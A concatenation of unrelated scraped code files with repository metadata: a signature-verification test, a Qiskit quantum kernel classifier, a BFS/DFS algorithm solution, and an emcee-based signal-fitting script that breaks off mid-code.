print("Signature verification with file:", colored_binary(cryptovinaigrette.rainbowKeygen.verify('cvPub.pub', signature, 'testFile.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
print()
print("Checking testFile.txt")
start = dt.now()
print("Signature verification with object :", colored_binary(cryptovinaigrette.rainbowKeygen.verify(myKeyObject.public_key, signature, 'testFile.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
if args.v >= 2:
print("Signature :", signature)
print()
print("Checking testFile2.txt")
start = dt.now()
print("Signature verification with tampered file :", colored_binary(cryptovinaigrette.rainbowKeygen.verify('rPub.rkey', signature, 'testFile2.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
if args.v >= 2:
print("Signature :", signature)
| aditisrinivas97/Crypto-Vinaigrette | test/test.py | test.py | py | 1,830 | python | en | code | 17 | github-code | 90 |
613430038 | import matplotlib.pyplot as plt
from qiskit.primitives import Sampler
from qiskit.algorithms.optimizers import SPSA, QNSPSA, GradientDescent, ADAM, COBYLA
from qiskit.circuit.library import ZZFeatureMap, TwoLocal, PauliFeatureMap, NLocal, RealAmplitudes, EfficientSU2
from qiskit.visualization import plot_histogram
from qiskit import Aer, transpile, QuantumCircuit
from sklearn.model_selection import train_test_split
from qiskit_machine_learning.algorithms.classifiers import VQC, QSVC, PegasosQSVC, NeuralNetworkClassifier
from qiskit_machine_learning.neural_networks import SamplerQNN, EstimatorQNN
from qiskit_machine_learning.kernels import FidelityQuantumKernel, TrainableFidelityQuantumKernel
from qiskit import QuantumCircuit
from qiskit.algorithms.state_fidelities import ComputeUncompute
from qiskit.circuit import ParameterVector, Parameter
from qiskit_machine_learning.utils.loss_functions import SVCLoss
from qiskit_machine_learning.kernels.algorithms import QuantumKernelTrainer
from VQCClassifier import VQCClassifier
from OptimizerLog import OptimizerLog
from ClassifierLog import ClassifierLog
from OptimizerLog import OptimizerLog
from QuantumEncoder import QuantumEncoder
import numpy as np
import pandas as pd
import seaborn as sns
# feature_names = ['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm', 'PetalWidthCm']
# label_name = 'Species'
# n_features = len(feature_names) # number of features
# n_train = 10 # number of samples in the training set
# n_test = 0.2 # number of samples in the test set
#
# data = pd.read_csv('data/Iris.csv')
# # subset of the data representing the three classes
# # data = pd.concat([data[0:10], data[50:60], data[100:110]])
# features = data[feature_names]
# # mapping of string to number
# mapping_dict = {class_name: id for id, class_name in enumerate(data[label_name].unique())}
# inverse_dict = {id: class_name for id, class_name in enumerate(data[label_name].unique())}
# labels = data[label_name].map(mapping_dict)
#
# n_classes = len(labels.unique()) # number of classes (clusters)
feature_names = ['island', 'bill_length_mm', 'bill_depth_mm', 'flipper_length_mm', 'body_mass_g', 'sex']
label_name = 'species'
n_features = len(feature_names) # number of features
n_train = 0.8 # number of samples in the training set
n_test = 0.2 # number of samples in the test set
data = sns.load_dataset('penguins')
data = data.dropna()
print(data.isnull().sum().sum())
features = data[['island', 'bill_length_mm', 'bill_depth_mm', 'flipper_length_mm', 'body_mass_g', 'sex']]
features['island'] = features['island'].copy().map({'Torgersen': 0, 'Biscoe': 1, 'Dream': 2})
features['sex'] = features['sex'].copy().map({'Male': 0, 'Female': 1})
labels = data['species'].map({'Adelie': 0, 'Chinstrap': 1, 'Gentoo': 2})
n_classes = len(labels.unique()) # number of classes (clusters)
# numpy array conversion
features = features.to_numpy()
labels = labels.to_numpy()
X_train, X_test, y_train, y_test = train_test_split(features,
labels,
train_size=n_train,
test_size=n_test,
stratify=labels)
# dimensionality reduction
# a random point to be represented as classical and quantum data
random_point = np.random.randint(len(data))
# make a feature map
feature_map = ZZFeatureMap(n_features, reps=1)
# add trainable gate at the beginning of the circuit
# training_params = [ParameterVector('θ', 1)]
training_params = [Parameter('θ')] # shared parameter
circ = QuantumCircuit(n_features)
circ.ry(training_params[0], 0)
circ.ry(training_params[0], 1)
circ.ry(training_params[0], 2)
circ.ry(training_params[0], 3)
# make trainable feature map
feature_map = circ.compose(feature_map)
feature_map.decompose().draw(output='mpl')
plt.savefig('img/qsvm/trainable_feature_map')
# instantiate a trainable kernel
fidelity = ComputeUncompute(sampler=Sampler())
# kernel = FidelityQuantumKernel(feature_map=feature_map, fidelity=fidelity)
kernel = TrainableFidelityQuantumKernel(feature_map=feature_map,
fidelity=fidelity,
training_parameters=training_params)
opt_log = OptimizerLog()
optimizer = SPSA(maxiter=50, callback=opt_log.update)
loss = SVCLoss(C=1.0)
trainer = QuantumKernelTrainer(quantum_kernel=kernel, loss=loss, optimizer=optimizer)
# optimize the kernel
print('optimizing quantum kernel...')
results = trainer.fit(X_train, y_train)
kernel = results.quantum_kernel
# plot the optimized kernel
# ...
# save kernel matrices
kernel_matrix_train = kernel.evaluate(x_vec=X_train)
plt.clf()
plt.imshow(np.asmatrix(kernel_matrix_train), interpolation='nearest', origin='upper', cmap='Blues')
plt.title('Training kernel matrix')
plt.savefig('img/qsvm/kernel_matrix_train')
kernel_matrix_test = kernel.evaluate(x_vec=X_test, y_vec=X_train)
plt.clf()
plt.imshow(np.asmatrix(kernel_matrix_test), interpolation='nearest', origin='upper', cmap='Reds')
plt.title('Testing kernel matrix')
plt.savefig('img/qsvm/kernel_matrix_test')
qsvc = QSVC(quantum_kernel=kernel)
print('training QSVC...')
qsvc.fit(X_train, y_train)
score = qsvc.score(X_test, y_test)
print('testing score: {}'.format(score))
print('end')
| PietroSpalluto/quantum-machine-learning | qsvc.py | qsvc.py | py | 5,357 | python | en | code | 0 | github-code | 90 |
26156715164 | # -*- coding: utf-8 -*-
# 링크 : https://arisel.notion.site/1260-DFS-BFS-cd6efe20107744c8810298405555523e
from collections import deque
import sys
class DFSAndBFS(object):
def __init__(self, n, m, v, map_links):
self.n_node = n
self.n_link = m
self.start_node = v
self.map_links = map_links
self.graph = [[] for _ in range(n+1)]
self.dfs_linked = []
self.bfs_linked = []
def _make_map(self):
for i,j in self.map_links:
self.graph[i].append(j)
self.graph[j].append(i)
for i,v in enumerate(self.graph):
v.sort()
def _dfs(self):
dfs_check_list = [False]*(self.n_node + 1)
dfs_stack = [self.start_node]
while dfs_stack:
i = dfs_stack.pop()
if not dfs_check_list[i]:
dfs_check_list[i] = True
self.dfs_linked.append(i)
dfs_stack += list(reversed(self.graph[i]))
def _bfs(self):
bfs_check_list = [False]*(self.n_node + 1)
bfs_queue = deque([self.start_node])
bfs_check_list[self.start_node] = True
while bfs_queue:
i = bfs_queue.popleft()
self.bfs_linked.append(i)
for j in self.graph[i]:
if not bfs_check_list[j]:
bfs_queue.append(j)
bfs_check_list[j] = True
def _return(self):
print(*self.dfs_linked)
print(*self.bfs_linked)
def solve(self):
self._make_map()
self._dfs()
self._bfs()
self._return()
if __name__ == "__main__":
n, m, v = list(map(int, sys.stdin.readline().split()))
map_links = []
for _ in range(m):
map_links.append(list(map(int, sys.stdin.readline().split())))
DFSAndBFS_problem = DFSAndBFS(n, m, v, map_links)
DFSAndBFS_problem.solve()
| arisel117/BOJ | code/BOJ 1260.py | BOJ 1260.py | py | 1,675 | python | en | code | 0 | github-code | 90 |
17987109849 | #!/usr/bin/env python3
n = int(input())
a = list(map(int, input().split()))
def rank(n):
if 1 <= n <= 399:
return 'gray'
elif 400 <= n <= 799:
return 'brown'
elif 800 <= n <= 1199:
return 'green'
elif 1200 <= n <= 1599:
return 'skyblue'
elif 1600 <= n <= 1999:
return 'blue'
elif 2000 <= n <= 2399:
return 'yellow'
elif 2400 <= n <= 2799:
return 'orange'
elif 2800 <= n <= 3199:
return 'red'
else:
return 'others'
colors = [rank(a[i]) for i in range(n)]
numother = colors.count('others')
colors = set(colors)
if 'others' in colors:
colors.remove('others')
minimum = len(colors)
tmp = minimum
if minimum == 0:
minimum = 1
maximum = tmp + numother
else:
minimum = len(colors)
maximum = minimum
print(minimum, maximum)
| Aasthaengg/IBMdataset | Python_codes/p03695/s615455860.py | s615455860.py | py | 866 | python | en | code | 0 | github-code | 90 |
20878733420 | from simple_launch import SimpleLauncher
import yaml
import os
sl = SimpleLauncher()
sl.declare_arg('field', 'uwFog')
sl.declare_arg('base', 'night')
def launch_setup():
rgb = sl.find('coral','rgb.yaml')
with open(rgb) as f:
config = yaml.safe_load(f)
config['color']['field'] = sl.arg('field')
config['color']['base'] = sl.arg('base')
with open(rgb,'w') as f:
yaml.safe_dump(config, f)
sl.node('slider_publisher',arguments=[rgb])
return sl.launch_description()
generate_launch_description = sl.launch_description(launch_setup)
| oKermorgant/coral | custom_scene/rgb_launch.py | rgb_launch.py | py | 582 | python | en | code | 3 | github-code | 90 |
33693032619 | import cv2
import numpy as np
class HolesFinder:
#finding holes on single object
def find_holes(self, found_object):
in_gray_object = cv2.cvtColor(found_object, cv2.COLOR_BGR2GRAY)
circles = cv2.HoughCircles(in_gray_object,cv2.HOUGH_GRADIENT, 1, 35,
param1=43, param2=18, minRadius=4, maxRadius=16)
circle_counter = 0
if circles is not None:
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
circle_counter += 1
return circles, circle_counter
| JacobMod/Lego_holes_finder | src/holes_finder.py | holes_finder.py | py | 599 | python | en | code | 1 | github-code | 90 |
44259659122 | import re
import asyncio
from concurrent.futures import ThreadPoolExecutor
def asyncrun(ls, func):
'''
ls: 需要遍历的列表
func: 函数
'''
loop = asyncio.get_event_loop()
tasks = []
executor = ThreadPoolExecutor(25)
for i in ls:
futures = loop.run_in_executor(executor, func, i)
tasks.append(futures)
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
def get_m3u8_ls(m3u8file):
'''
m3u8file: m3u8文件
'''
with open(m3u8file, 'r') as fp:
t = fp.read()
ls = re.findall(r"\n([^\n]+ts)\n", t)
return ls
| apammaaaa/jhcrawler | jcrawler/mdownload.py | mdownload.py | py | 606 | python | en | code | 0 | github-code | 90 |
23046529021 | '''
354. Russian Doll Envelopes
Hard
You are given a 2D array of integers envelopes where envelopes[i] = [wi, hi] represents the width and the height of an envelope.
One envelope can fit into another if and only if both the width and height of one envelope are greater than the other envelope's width and height.
Return the maximum number of envelopes you can Russian doll (i.e., put one inside the other).
Note: You cannot rotate an envelope.
Example 1:
Input: envelopes = [[5,4],[6,4],[6,7],[2,3]]
Output: 3
Explanation: The maximum number of envelopes you can Russian doll is 3 ([2,3] => [5,4] => [6,7]).
https://leetcode.com/problems/russian-doll-envelopes
'''
class Solution:
def maxEnvelopes(self, A):
A.sort(key = lambda x: (x[0], -x[1]))
Y_val = [y for _,y in A]
retVal = 0
dp = []
for y in Y_val:
i = bisect.bisect_left(dp, y)
if i == len(dp):
dp.append(y)
else:
dp[i] = y
if i == retVal:
retVal += 1
return retVal
| aditya-doshatti/Leetcode | russian_doll_envelopes_354.py | russian_doll_envelopes_354.py | py | 1,082 | python | en | code | 0 | github-code | 90 |
15009260868 | import re
import datetime
from enum import Enum
class OneNight:
def __init__(self, guardID=None):
self.guardID = guardID or None
self.minutes = [0] * 60
class State(Enum):
asleep = "asleep"
awake = "awake"
def extractDate(line):
match = re.match('\[([0-9]*)-([0-9]*)-([0-9]*) ([0-9]*):([0-9]*)\]', line)
return datetime.datetime(int(match.group(1)), int(match.group(2)), int(match.group(3)), int(match.group(4)), int(match.group(5)))
def extractGuard(line):
match = re.match('\[.*\] Guard #([0-9]*) begins shift', line)
return int(match.group(1))
def readFile():
operationHash = {}
try:
fp = open('input.txt', 'r')
line = fp.readline().strip()
while line:
print(line)
date = extractDate(line)
if "Guard" in line:
operationHash[date] = extractGuard(line)
elif "wakes up" in line:
operationHash[date] = State.awake
elif "falls asleep" in line:
operationHash[date] = State.asleep
line = fp.readline().strip()
return operationHash
finally:
fp.close()
def guardSleeping(guardID, startTime, endTime, newHash):
newDate = startTime.replace(minute=0);
if not newDate in newHash:
newHash[newDate] = OneNight(guardID = guardID)
for x in range(startTime.minute, endTime.minute):
newHash[newDate].minutes[x] = 1
print ("{}: {} - {} {}".format(guardID, startTime, endTime, newDate))
def rotateData(operationData):
guardID = ''
lastSleepTime = 0
newHash = {}
for key in sorted(operationData.keys()):
time = key
value = operationData[key]
if value == State.awake:
guardSleeping(guardID, lastSleepTime, key, newHash)
elif value == State.asleep:
lastSleepTime = key
else:
guardID = value
return newHash
def prettyPrintHash(newHash):
for x in sorted(newHash.keys()):
thisLine = str(x) + ": " + str(newHash[x].guardID) + "\t"
for y in range(60):
if (newHash[x].minutes[y] == 0):
thisLine += "."
else:
thisLine += "*"
thisLine += "({})".format(countMinutesAsleep(newHash[x].minutes))
print(thisLine)
def countMinutesAsleep(minuteList):
minutesAsleep = 0
for x in minuteList:
if not x == 0:
minutesAsleep+=1
return minutesAsleep
def sumMinutesPerGuard(newHash):
minuteGuardHash = {}
for x in sorted(newHash.keys()):
guardID = newHash[x].guardID
if not guardID in minuteGuardHash:
minuteGuardHash[guardID] = 0
minuteGuardHash[guardID] += countMinutesAsleep(newHash[x].minutes)
print (minuteGuardHash)
maxGuardID = list(minuteGuardHash.keys())[0]
for y in minuteGuardHash.keys():
if (minuteGuardHash[y] > minuteGuardHash[maxGuardID]):
maxGuardID = y
print(maxGuardID)
return maxGuardID
def findSleepiestMinute(newHash, guardID):
minutesInHour = [0] * 60
for x in newHash.keys():
if not newHash[x].guardID == guardID:
continue
for y in range(60):
minutesInHour[y] += newHash[x].minutes[y]
sleepiestMinute = 0
for z in range(60):
if minutesInHour[z] > minutesInHour[sleepiestMinute]:
sleepiestMinute = z
print("Guard {}:\t{} {} ({})".format(guardID, sleepiestMinute, minutesInHour[sleepiestMinute], guardID * sleepiestMinute))
return sleepiestMinute
def findSleepiestMinuteForAllGuards(newHash):
guardList = []
for x in newHash.keys():
if not newHash[x].guardID in guardList:
guardList.append(newHash[x].guardID)
for y in guardList:
findSleepiestMinute(newHash, y)
operationData = readFile()
newHash = rotateData(operationData)
prettyPrintHash(newHash)
sleepiestGuard = sumMinutesPerGuard(newHash)
sleepiestMinute = findSleepiestMinute(newHash, sleepiestGuard)
print(sleepiestGuard * sleepiestMinute)
findSleepiestMinuteForAllGuards(newHash) | TinaFemea/AOC2018 | Day4/D4P1.py | D4P1.py | py | 3,615 | python | en | code | 0 | github-code | 90 |
8447073187 | '''
wapp to read tuple of integers from the user & print in descending
'''
list_data = []
tuple_data = ()
reply = input("do u wish to add integers y/n ")
while reply == 'y':
ele = input("enter no to add ")
list_data.append(ele)
reply = input("do u wish to more np y/ n ")
tuple_data = tuple(list_data)
print("Original data", tuple_data)
list_data.sort(reverse =True)
tuple_data = tuple(list_data)
print("Sorted data", tuple_data)
| dravya08/workshop-python | L7/P2.py | P2.py | py | 443 | python | en | code | 0 | github-code | 90 |
41705560618 | import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
import pymongo
from utility.photo_interface import PhotoInterface
import logging
logging.basicConfig(filename = "/.freespace/instagram_storage.log", level=logging.DEBUG,
format=' [%(asctime)s] [%(levelname)s] (%(threadName)-10s) %(message)s '
)
def save_mogo(res, mid_lat, mid_lng):
photo_interface = PhotoInterface()
for r in res:
logging.warning("type = "+str(type(r)))
r['mid_lat'] = mid_lat
r['mid_lng'] = mid_lng
r['_id'] = r['id'] #filter dup using instagram internal id
logging.warning('inserting photo to mongodb')
photo_interface.saveDocument(r)
logging.warning("r = "+str(r))
#mongo.close()
| juicyJ/citybeat_online | crawlers/instagram_crawler/mongo_storage.py | mongo_storage.py | py | 789 | python | en | code | 0 | github-code | 90 |
14351058211 | import gym
from rlsuite.examples.cartpole import cartpole_constants
from rlsuite.examples.cartpole.cartpole_constants import check_termination, LOGGER_PATH
from rlsuite.agents.classic_agents.mc_agent import MCAgent
import logging.config
from rlsuite.utils.quantization import Quantization
from rlsuite.utils.functions import plot_rewards, plot_rewards_completed
import matplotlib.pyplot as plt
from rlsuite.utils.constants import LOGGER
# COMMENT it seems that monte carlo has high variance maybe we should reduce exploration
logging.config.fileConfig(LOGGER_PATH)
logger = logging.getLogger(LOGGER)
if __name__ == "__main__":
env = gym.make(cartpole_constants.environment)
train_durations = {}
eval_durations = {}
num_of_actions = env.action_space.n
dimensions_high_barriers = env.observation_space.high
dimensions_low_barriers = env.observation_space.low
# if we want to exclude one dimension we can set freq=1
dimensions_description = list(zip(dimensions_low_barriers, dimensions_high_barriers, cartpole_constants.var_freq))
quantizator = Quantization(dimensions_description)
agent = MCAgent(num_of_actions, quantizator.dimensions)
for i_episode in range(cartpole_constants.max_episodes):
# Initialize the environment and state
done = False
train = True
if (i_episode + 1) % cartpole_constants.EVAL_INTERVAL == 0:
train = False
next_observation = env.reset()
agent.adjust_exploration(i_episode)
state_action_ls = []
reward_ls = []
t = 0
while not done:
t += 1
# env.render()
state = quantizator.digitize(next_observation)
action = agent.choose_action(state, train=train) # Select and perform an action
next_observation, reward, done, _ = env.step(action)
state_action_ls.append((state, action))
reward_ls.append(reward)
if train:
train_durations[i_episode] = (t + 1)
discounted_rewards = agent.calculate_rewards(reward_ls)
agent.update(state_action_ls, discounted_rewards)
else:
eval_durations[i_episode] = (t + 1)
if check_termination(eval_durations):
logger.info('Solved after {} episodes.'.format(len(train_durations)))
break
plot_rewards(train_durations, eval_durations)
else:
logger.info("Unable to reach goal in {} training episodes.".format(len(train_durations)))
plot_rewards_completed(train_durations, eval_durations)
env.close()
plt.show()
| nikmand/Reinforcement-Learning-Algorithms | rlsuite/examples/cartpole/cartpole_monte_carlo.py | cartpole_monte_carlo.py | py | 2,631 | python | en | code | 0 | github-code | 90 |
40326631715 | #!/usr/bin/python3
# coding: utf-8
# 1,MS-Celeb-1M数据集:
# MSR IRC是目前世界上规模最大、水平最高的图像识别赛事之一,由MSRA(微软亚洲研究院)图像分析、大数据挖掘研究组组长张磊发起,每年定期举办。
# 从1M个名人中,根据他们的受欢迎程度,选择100K个。然后,利用搜索引擎,给100K个人,每人搜大概100张图片。共100K * 100 = 10M个图片。
# 测试集包括1000个名人,这1000个名人来自于1M个明星中随机挑选。而且经过微软标注。每个名人大概有20张图片,这些图片都是网上找不到的。
# 其他常用人脸数据集:CAISA - WebFace, VGG - Face, MegaFace.
#
# 数据有对齐版可以直接用于训练(共80G数据):
#
#
#
# 数据下载地址:https://hyper.ai/datasets/5543
#
# 2,FaceImageCroppedWithAlignment.tsv文件提取参考: https://www.twblogs.net/a/5ba2faf12b71771a4daa0c47/
#
# 下载并解压微软的大型人脸数据集MS-Celeb-1M后,将FaceImageCroppedWithAlignment.tsv文件还原成JPG图片格式。代码如下:
import base64
import struct
import os
def read_line(line):
m_id, image_search_rank, image_url, page_url, face_id, face_rectangle, face_data = line.split(" ")
rect = struct.unpack("ffff", base64.b64decode(face_rectangle))
return m_id, image_search_rank, image_url, page_url, face_id, rect, base64.b64decode(face_data)
def write_image(filename, data):
with open(filename, "wb") as f:
f.write(data)
def unpack(file_name, output_dir):
i = 0
with open(file_name, "r", encoding="utf-8") as f:
for line in f:
m_id, image_search_rank, image_url, page_url, face_id, face_rectangle, face_data = read_line(line)
img_dir = os.path.join(output_dir, m_id)
if not os.path.exists(img_dir):
os.mkdir(img_dir)
img_name = "%s-%s" % (image_search_rank, face_id) + ".jpg"
write_image(os.path.join(img_dir, img_name), face_data)
i += 1
if i % 1000 == 0:
print(i, "images finished")
# 仅仅演示,提取100张图像
if i > 20:
break
print("all finished")
def main():
file_name = "/media/gswyhq/000F3553000267F4/g_pan/MS-Celeb-1M/data/aligned_face_images/FaceImageCroppedWithAlignment.tsv"
output_dir = "/media/gswyhq/000F3553000267F4/g_pan/MS-Celeb-1M/test_data2"
unpack(file_name, output_dir)
# 提取后数据总共800多万张人脸图像:
#
#
#
# 3,其中同一目录图像有很多数据并非是同一人
#
# 网上有一份清理的文档 MS-Celeb-1M_clean_list.txt(包含79076个人,5049824张人脸图像)
if __name__ == '__main__':
main() | gswyhq/hello-world | deep-learning深度学习/解析MS-Celeb-1M人脸数据集及FaceImageCroppedWithAlignment.tsv文件提取.py | 解析MS-Celeb-1M人脸数据集及FaceImageCroppedWithAlignment.tsv文件提取.py | py | 2,773 | python | zh | code | 9 | github-code | 90 |
8008554697 | # -*- coding: utf-8 -*-
"""
Main program entrance: launches GUI application,
handles logging and status calls.
------------------------------------------------------------------------------
This file is part of h3sed - Heroes3 Savegame Editor.
Released under the MIT License.
@created 14.03.2020
@modified 20.03.2022
------------------------------------------------------------------------------
"""
import argparse
import gzip
import locale
import logging
import os
import sys
import threading
import traceback
import wx
from . lib import util
from . import conf
from . import guibase
from . import gui
logger = logging.getLogger(__package__)
ARGUMENTS = {
"description": conf.Title,
"arguments": [
{"args": ["-v", "--version"], "action": "version",
"version": "%s %s, %s." % (conf.Title, conf.Version, conf.VersionDate)},
{"args": ["FILE"], "nargs": "?",
"help": "Savegame to open on startup, if any"},
],
}
class MainApp(wx.App):
def InitLocale(self):
self.ResetLocale()
if "win32" == sys.platform: # Avoid dialog buttons in native language
mylocale = wx.Locale(wx.LANGUAGE_ENGLISH_US, wx.LOCALE_LOAD_DEFAULT)
mylocale.AddCatalog("wxstd")
self._initial_locale = mylocale # Override wx.App._initial_locale
# Workaround for MSW giving locale as "en-US"; standard format is "en_US".
# Py3 provides "en[-_]US" in wx.Locale names and accepts "en" in locale.setlocale();
# Py2 provides "English_United States.1252" in wx.Locale.SysName and accepts only that.
name = mylocale.SysName if sys.version_info < (3, ) else mylocale.Name.split("_", 1)[0]
locale.setlocale(locale.LC_ALL, name)
def except_hook(etype, evalue, etrace):
"""Handler for all unhandled exceptions."""
text = "".join(traceback.format_exception(etype, evalue, etrace)).strip()
log = "An unexpected error has occurred:\n\n%s"
logger.error(log, text)
if not conf.PopupUnexpectedErrors: return
msg = "An unexpected error has occurred:\n\n%s\n\n" \
"See log for full details." % util.format_exc(evalue)
wx.CallAfter(wx.MessageBox, msg, conf.Title, wx.OK | wx.ICON_ERROR)
def install_thread_excepthook():
"""
Workaround for sys.excepthook not catching threading exceptions.
@from https://bugs.python.org/issue1230540
"""
init_old = threading.Thread.__init__
def init(self, *args, **kwargs):
init_old(self, *args, **kwargs)
run_old = self.run
def run_with_except_hook(*a, **b):
try: run_old(*a, **b)
except Exception: sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def patch_gzip_for_partial():
"""
Replaces gzip.GzipFile._read_eof with a version not throwing CRC error.
for decompressing partial files.
"""
def read_eof_py3(self):
self._read_exact(8)
# Gzip files can be padded with zeroes and still have archives.
# Consume all zero bytes and set the file position to the first
# non-zero byte. See http://www.gzip.org/#faq8
c = b"\x00"
while c == b"\x00":
c = self._fp.read(1)
if c:
self._fp.prepend(c)
def read_eof_py2(self):
# Gzip files can be padded with zeroes and still have archives.
# Consume all zero bytes and set the file position to the first
# non-zero byte. See http://www.gzip.org/#faq8
c = "\x00"
while c == "\x00":
c = self.fileobj.read(1)
if c:
self.fileobj.seek(-1, 1)
readercls = getattr(gzip, "_GzipReader", gzip.GzipFile) # Py3/Py2
readercls._read_eof = read_eof_py2 if readercls is gzip.GzipFile else read_eof_py3
def run_gui(filename):
"""Main GUI program entrance."""
global logger
# Set up logging to GUI log window
logger.addHandler(guibase.GUILogHandler())
logger.setLevel(logging.DEBUG)
patch_gzip_for_partial()
install_thread_excepthook()
sys.excepthook = except_hook
# Create application main window
app = MainApp(redirect=True) # stdout and stderr redirected to wx popup
window = gui.MainWindow()
app.SetTopWindow(window) # stdout/stderr popup closes with MainWindow
# Some debugging support
window.run_console("import datetime, math, os, re, time, sys, wx")
window.run_console("# All %s standard modules:" % conf.Title)
window.run_console("import h3sed")
window.run_console("from h3sed import conf, guibase, gui, images, "
"main, metadata, plugins, templates")
window.run_console("from h3sed.lib import controls, util, wx_accel")
window.run_console("")
window.run_console("self = wx.GetApp().TopWindow # Application main window")
if filename and os.path.isfile(filename):
wx.CallAfter(wx.PostEvent, window, gui.OpenSavefileEvent(-1, filename=filename))
app.MainLoop()
def run():
"""Parses command-line arguments and runs GUI."""
conf.load()
argparser = argparse.ArgumentParser(description=ARGUMENTS["description"])
for arg in ARGUMENTS["arguments"]:
argparser.add_argument(*arg.pop("args"), **arg)
argv = sys.argv[1:]
if "nt" == os.name: # Fix Unicode arguments, otherwise converted to ?
argv = util.win32_unicode_argv()[1:]
arguments, _ = argparser.parse_known_args(argv)
if arguments.FILE: arguments.FILE = util.longpath(arguments.FILE)
run_gui(arguments.FILE)
if "__main__" == __name__:
run()
| suurjaak/h3sed | src/h3sed/main.py | main.py | py | 5,800 | python | en | code | 1 | github-code | 90 |
5599915244 | def solution(numbers, hand):
def get_distance(x, y):
return abs(x[0]-y[0]) + abs(x[1]-y[1])
# initialize keypad dict : {num, (coordinate ; x, y)}
keypad = {}
for i in range(1,10):
keypad[i] = (i-1) // 3, (i-1) % 3
keypad['*']=(3,0); keypad[0]=(3,1); keypad['#']=(3,2)
answer = []
LH = '*'
RH = '#'
for num in numbers:
if num in [1,4,7]:
state = 'LH'
elif num in [3,6,9]:
state = 'RH'
else: # num in [0,2,5,8]
L_dist = get_distance(keypad[LH], keypad[num])
R_dist = get_distance(keypad[RH], keypad[num])
if L_dist > R_dist:
state = 'RH'
elif L_dist < R_dist:
state = 'LH'
else:
if hand == 'left':
state = 'LH'
else:
state = 'RH'
if state == 'LH':
answer.append('L')
LH = num
else:
answer.append('R')
RH = num
return ''.join(answer)
input = [7, 0, 8, 2, 8, 3, 1, 5, 7, 6, 2]
main_hand = "left`"
print(solution(input, "left")) | jinhyung-noh/algorithm-ps | Programmers/level1/20210608_Keypad.py | 20210608_Keypad.py | py | 1,175 | python | en | code | 0 | github-code | 90 |
8569287954 | from torch import nn
import torch
if __name__=='__main__':
from utils import clones
else:
from .utils import clones
import torch.nn.functional as F
class MmFall(nn.Module):
'''
模型开始前的预卷积
'''
def __init__(self):
super(MmFall, self).__init__()
self.p1 = nn.Linear(96,160)
self.p2 = nn.Linear(160,320)
self.p3 = nn.Linear(320,160)
self.p4 = nn.Linear(160,40)
self.p5 = nn.Linear(40,10)
self.p6 = nn.Linear(10,1)
def forward(self, x):
b1 = self.p1(x)
b2 = self.p2(b1)
b3 = self.p3(b2)
b4 = self.p4(b3)
b5 = self.p5(b4)
b6 = self.p6(b5)
res = F.sigmoid(b6)
return res
def make_model(
):
"Helper: Construct a model from hyperparameters."
# c = copy.deepcopy
# attn = MultiHeadedAttention(head, d_model)
# ff = ConvFeedForward(d_model, d_ff, kernel_size=5, dropout=dropout)
model = SkeFall()
# # This was important from their code.
# # Initialize parameters with Glorot / fan_avg.
for p in model.parameters():
if p.dim() > 1:
nn.init.xavier_uniform_(p)
return model | southner/fall_detect | model/mm_fall.py | mm_fall.py | py | 1,199 | python | en | code | 0 | github-code | 90 |
30750226333 | import matplotlib
matplotlib.use("Agg")
import numpy
import os
my_home = os.popen("echo $HOME").readlines()[0][:-1]
from sys import path,argv
path.append('%s/work/mylib/'%my_home)
from Fourier_Quad import Fourier_Quad
from plot_tool import Image_Plot
import emcee
import corner
import time
import matplotlib.pyplot as plt
from multiprocessing import Pool
import h5py
def ln_gh_prior(theta):
a1, a2, a3, a4, a5 = theta
if -0.1 < a1 < 0.1 and -0.1 < a2 < 0.1 and -0.1 < a3 < 0.1 and -0.1 < a4 < 0.1 and -0.1 < a5 < 0.1:
return 0.0
return -numpy.inf
def ln_prob(theta, G, bins, bin_num2, inverse, x, x2, x3, x4, signal_num):
lp = ln_gh_prior(theta)
if not numpy.isfinite(lp):
return -numpy.inf
else:
a1, a2, a3, a4, a5 = theta
G_h = G - a1 - a2*x - a3*x2 - a4*x3 - a5*x4
xi = 0
for i in range(signal_num):
num = numpy.histogram(G_h[i], bins)[0]
n1 = num[0:bin_num2][inverse]
n2 = num[bin_num2:]
xi += numpy.sum((n1 - n2) ** 2 / (n1 + n2))*0.5
return lp - xi
def result_fun(params, coord):
f, f_sig = 0, 0
tag = 0
for para in params:
x = coord**tag
f += para[0]*x
f_sig += (para[1] + para[2])/2*x
tag += 1
return f, f_sig
# a1 = -0.02
# a2 = -0.02
# a3 = 0.05
a1 = -0.035
a2 = 0.01
a3 = 0.02
a4 = 0
a5 = 0
num = int(argv[1])
ncpus = int(argv[2])
signal_num = 15
nwalkers = 300
ndim = 5
step = 600
print("Walker: %d. Step: %d."%(nwalkers, step))
fq = Fourier_Quad(10, 112)
bin_num = 8
bin_num2 = int(bin_num / 2)
x = numpy.linspace(-1, 1, signal_num).reshape((signal_num, 1))
x2 = x*x
x3 = x*x*x
x4 = x*x*x*x
signals = a1 + a2*x + a3*x2 + a4*x3 + a5*x4
parameters = [a1, a2, a3, a4, a5]
print("Signals: ", signals[:,0],".\n%.4f + %.4f*x + %.4f*x^2 + %.4f*x^3 + %.4f*x^4"%(a1,a2,a3, a4, a5))
ellip = numpy.zeros((signal_num, num))
img = Image_Plot()
img.subplots(1,1)
fq_shear = numpy.zeros((2,signal_num))
for i in range(signal_num):
# rng = numpy.random.RandomState(i+1)
# ellip[i] = rng.normal(signals[i,0], 0.3, num)
ellip[i] = numpy.random.normal(signals[i,0], 0.3, num)
# noise = rng.normal(0, numpy.abs(ellip[i])/5)
# ellip[i] += noise
t1 = time.time()
gh, gh_sig = fq.fmin_g_new(ellip[i], numpy.ones_like(ellip[i]), 8)[:2]
fq_shear[0, i] = gh
fq_shear[1, i] = gh_sig
t2 = time.time()
print("signal:[%.4f at %.4f] %.4f (%.4f) [%d gal], Time: %.2f sec"%(signals[i,0], x[i,0], gh, gh_sig, num, t2-t1))
img.axs[0][0].hist(ellip[i], 100, histtype="step", label="%.4f" % signals[i])
img.save_img("./pic/data_hist.png")
# img.show_img()
img.close_img()
# find the signal
all_ellip = ellip.reshape((num*signal_num,))
ellip_bins = fq.set_bin(all_ellip, 8, 1.5)
